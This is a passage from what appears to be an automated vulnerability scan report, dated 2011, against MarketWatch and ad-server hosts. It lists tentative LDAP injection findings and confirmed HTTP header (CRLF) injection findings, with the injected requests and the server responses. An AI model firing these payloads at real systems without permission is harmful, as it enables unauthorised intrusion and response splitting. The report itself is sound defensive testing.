X-Machine: SEC-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/*)!(sn=*/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:11 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

2.4. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /MW5/content/*)(sn=*/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:12 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/*)!(sn=*/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.5. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /MW5/content/story/*)(sn=*/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:13 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/story/*)!(sn=*/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.6. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /MW5/*)(sn=*/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:07 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/*)!(sn=*/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

2.7. http://s.marketwatch.com/public/resources/documents/PixelTracking.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s.marketwatch.com
Path:   /public/resources/documents/PixelTracking.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /public/*)(sn=*/documents/PixelTracking.html?site=marketwatch.com&zone=frontpage&cb=604870 HTTP/1.1
Host: s.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep08 - Sat 05/14/11 - 00:44:45 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html; charset=UTF-8
Date: Sat, 14 May 2011 10:16:03 GMT
Connection: close
Content-Length: 79968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!--
var openHouseMode="false",pDateinSpanish="s?bado, 14 de mayo, 2011, 00:44:45 EDT",uP="http://online.wsj.com",mpsection="WSJ_ErrorPage",isDenial="false",pDate="Saturday,&nbsp;May&nbsp;14,&nbsp;2011&nbsp;As of&nbsp;12:44&nbsp;AM&nbsp;EDT",_navText="Error Page",gcLFU="https://commerce.wsj.com/auth/submitlogin",pID="0_0_WP_5000",cdnDomain="http://s.wsj.net",nSP="",parentTabID="HNTAB1",gcDomain="online.wsj.com",isTrial="false",isFree="false",PSSG="header0_0_WP_5000",gcHSP="https://",globalHeaderPageTitle="Error Page",pDateinGMT="Saturday,May 14, 2011 04:44:45 GMT",PSS="0_0_WP_5000",pStl="renovation",gcPH="/pj/PortfolioDisplay.cgi",pDateinPortuguese="S?bado, 14 de Maio, 2011, 00:44:45 EDT";
window.name = "wndMain"
//--></script>
<script type="text/javascript" src="http://sj.wsj.net/djscript/require/j_top/version/20110513185311.js"></script>
<script type="text/javascript" src="/public/page/0_0_W0_1011.html"></script>
<script type="text/javascript">
/* <![CDATA[ */
var jsexec = dj.util.JSExec(dj.context.jsexec);
djPerf.firstMark=((new Date()).getTime());if (typeof gomez == "undefined") { this.gomez = {}; }
/* ]]> */
</script>
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="stylesheet" href="http://sc.wsj.net/djstyle/2/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/3/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/4/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><!--[if lt IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie6/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie7/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 8]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie8/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
</head>
<body >
<a name="top"></a><div c
...[SNIP]...

Request 2

GET /public/*)!(sn=*/documents/PixelTracking.html?site=marketwatch.com&zone=frontpage&cb=604870 HTTP/1.1
Host: s.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep07 - Fri 05/13/11 - 00:47:29 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html; charset=UTF-8
Date: Sat, 14 May 2011 10:16:03 GMT
Connection: close
Content-Length: 89095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!--
var openHouseMode="false",pDateinSpanish="viernes, 13 de mayo, 2011, 00:47:28 EDT",uP="http://online.wsj.com",mpsection="WSJ_ErrorPage",isDenial="false",pDate="Friday,&nbsp;May&nbsp;13,&nbsp;2011&nbsp;As of&nbsp;12:47&nbsp;AM&nbsp;EDT",_navText="Error Page",gcLFU="https://commerce.wsj.com/auth/submitlogin",pID="0_0_WP_5000",cdnDomain="http://s.wsj.net",nSP="",parentTabID="HNTAB1",gcDomain="online.wsj.com",isTrial="false",isFree="false",PSSG="header0_0_WP_5000",gcHSP="https://",globalHeaderPageTitle="Error Page",pDateinGMT="Friday,May 13, 2011 04:47:28 GMT",PSS="0_0_WP_5000",pStl="renovation",gcPH="/pj/PortfolioDisplay.cgi",pDateinPortuguese="Sexta-feira, 13 de Maio, 2011, 00:47:28 EDT";
window.name = "wndMain"
//--></script>
<script type="text/javascript" src="http://sj.wsj.net/djscript/require/j_top/version/20110512230933.js"></script>
<script type="text/javascript" src="/public/page/0_0_W0_1011.html"></script>
<script type="text/javascript">
/* <![CDATA[ */
var jsexec = dj.util.JSExec(dj.context.jsexec);
djPerf.firstMark=((new Date()).getTime());if (typeof gomez == "undefined") { this.gomez = {}; }
/* ]]> */
</script>
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="stylesheet" href="http://sc.wsj.net/djstyle/2/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/3/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><link rel="stylesheet" href="http://sc.wsj.net/djstyle/4/std/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><!--[if lt IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie6/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 7]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie7/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
<!--[if IE 8]><link rel="stylesheet" href="http://sc.wsj.net/djstyle/1/ie8/NA_WSJ/0_0_WP_5000-20110430220943.css" type="text/css" /><![endif]-->    
</head>
<body >
<a name="top"></a><div
...[SNIP]...

3. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d8084%0d%0a6b4a93a16b2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d8084%0d%0a6b4a93a16b2;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?&_dc_ck=try HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/d8084
6b4a93a16b2
;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682:
Date: Sat, 14 May 2011 10:09:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/activity [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 90707%0d%0a1e0827f149 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?90707%0d%0a1e0827f149 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1948992;type=wsjre849;cat=publi675;ord=347863952629.2682?90707
1e0827f149
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 14 May 2011 10:24:37 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 14 May 2011 10:09:37 GMT
Server: GFE/2.0
Content-Type: text/html


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload abf61%0d%0a3eb55aa738 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4891372~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~898~0~01020^ebAboveTheFoldDuration~898~0~01020&OptOut=0&ebRandom=0.4370704125612974&flv=abf61%0d%0a3eb55aa738&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
